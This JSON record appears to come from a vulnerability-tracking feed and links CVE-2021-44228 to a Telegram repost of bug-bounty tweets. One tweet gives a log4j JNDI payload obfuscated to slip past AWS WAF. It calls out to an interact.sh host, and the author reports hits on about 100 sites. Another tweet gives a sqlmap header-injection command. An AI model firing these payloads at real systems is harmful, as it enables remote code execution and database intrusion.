{"uuid": "a79e21ab-578b-4d5a-9a22-157acd866e7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/bhhub/688", "content": "#BugBountyTips of the Day\nWorking AWS/Cloudfront #log4j WAF Bypass within the URI path   http:\\/\\/hostname.com/${jndi${nagli:-:}ldap:${::-/}/${hostName}.anything.interact.sh/a}}  Please note that AWS WAF is self configurable, but I got hits on ~100 websites today with this payload.  #BugBounty  https://t.co/7awtKeCRbN\n---\nThis is how it all Started, SS is for those who get demotivated after some attempts only. Starts may be small, don\u2019t worry, you have started.  @Bugcrowd @caseyjohnellis @aflores2424 @fransrosen @Jhaddix #bugbounty #infosecurity  https://t.co/RmIgnkGDx6\n---\nYou can inject header too with SQLi POC: sqlmap -u \" https://t.co/KZfy5GompT\" --header=\"X-Forwarded-For: 1*\" --dbs --batch --random-agent --threads=10  Injection marker: * #bugbounty #bugbountytips  https://t.co/YcLtF87ESu\n---\nMy First #log4jrce on @Hacker0x01   \ud83d\ude0d\ud83d\ude0d\ud83d\ude0d Log4j CVE-2021-44228  #bugbountytips #BugBounty #hackers #Log4Shell  https://t.co/X25Z7afUN2\n---\nYay, I was awarded a $5,120 bounty on @Hacker0x01 ! Bug : Complete Log4j RCE   #TogetherWeHitHarder  @Hacker0x01 #bugbounty  Thanks @Hacker0x01  https://t.co/c9qPfR9HnV\n---\nMy 2022 BugBounty Goals\ud83c\udfaf:  - 20k in Bounties - 2000 Reputation points on @Hacker0x01  - 20x swags from Sony (For local charity center) - 20x RedBull trays (For local charity center) - [Redacted]  #bugbounty #togtherwehitharder\n---\nPython libraries and frameworks  #MachineLearning #python #100Daysofcode  #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #DataScience #MachineLearning #NeuralNetworks #CES2022 #OpenSource #AI #5G #IoT #DEVCommunity #codinglife via @atishkumarjain  https://t.co/T97il23Y6E", "creation_timestamp": "2021-12-25T13:37:04.000000Z"}